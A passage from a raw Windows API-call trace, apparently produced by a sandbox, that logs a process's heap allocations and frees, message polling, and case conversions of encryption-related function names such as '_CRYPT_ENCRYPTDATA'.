returned 1 [0172.146] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0172.146] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0172.146] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0172.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0172.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1201f) returned 0x9e5190 [0172.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0172.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0172.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0172.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0172.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0172.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0172.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1201f) returned 0xa5f008 [0172.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9e5190 | out: hHeap=0x8a0000) returned 1 [0172.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0172.149] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0172.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0172.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0172.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0172.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0172.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1201f) returned 0x9e5190 [0172.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0172.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9e5190 | out: hHeap=0x8a0000) returned 1 [0172.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0172.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0172.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0172.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0172.150] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0172.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0172.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0172.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0172.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0172.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0172.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0172.150] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0172.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0172.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0172.150] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0172.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0172.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0172.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0172.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26b8 [0172.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0172.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0172.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0172.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0172.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1201f) returned 0x9e5190 [0172.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0172.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2668 [0172.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0172.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0172.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0172.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c28e8 [0172.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0172.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0172.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0172.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2768 [0172.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0172.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0172.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0172.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd510 [0172.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0172.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0172.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0172.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0172.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0172.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1201f) returned 0xa71030 [0172.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0172.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0172.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0172.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0172.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0172.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0172.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0172.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0172.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0172.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0172.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0172.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0172.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0172.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0172.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0172.153] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0172.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0172.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0172.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0172.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0172.153] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0172.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0172.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0172.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0172.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0172.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0172.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0172.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0172.154] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0172.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0172.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0172.154] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0172.154] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0172.154] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0172.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0172.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2748 [0172.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0172.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0172.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0172.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0172.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd648 [0172.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0172.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0172.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0172.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0172.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0172.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0172.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0172.157] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0172.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0172.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0172.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0172.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0172.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0172.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0172.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0172.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0172.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0172.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0172.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0172.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0172.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0172.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0172.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0172.157] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0172.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0172.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0172.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0172.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0172.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0172.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0172.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0172.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0172.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0172.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0172.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0172.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0172.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0172.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0172.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0172.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0172.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0172.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0172.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0172.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0172.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0172.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0172.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0172.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0172.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0172.159] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0172.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0172.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0172.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0172.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0172.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0172.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0172.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0172.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0172.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0172.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0172.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0172.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0172.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0172.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0172.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0172.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0172.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0172.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0172.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0172.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0172.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0172.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0172.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0172.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0172.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0172.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0172.160] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0172.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0172.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0172.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0172.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0172.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0172.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0172.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0172.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0172.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0172.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0172.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0172.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0172.160] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0172.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0172.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0172.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd570 [0172.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0172.161] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0172.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0172.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0172.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0172.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0172.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0172.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0172.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0172.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0172.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0172.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0172.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0172.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0172.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0172.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0172.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0172.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0172.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0172.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0172.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0172.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0172.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0172.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0172.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0172.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0172.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0172.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0172.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0172.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0172.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0172.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0172.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0172.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0172.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0172.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0172.162] HeapFree (in: hHeap=0x8a0000, 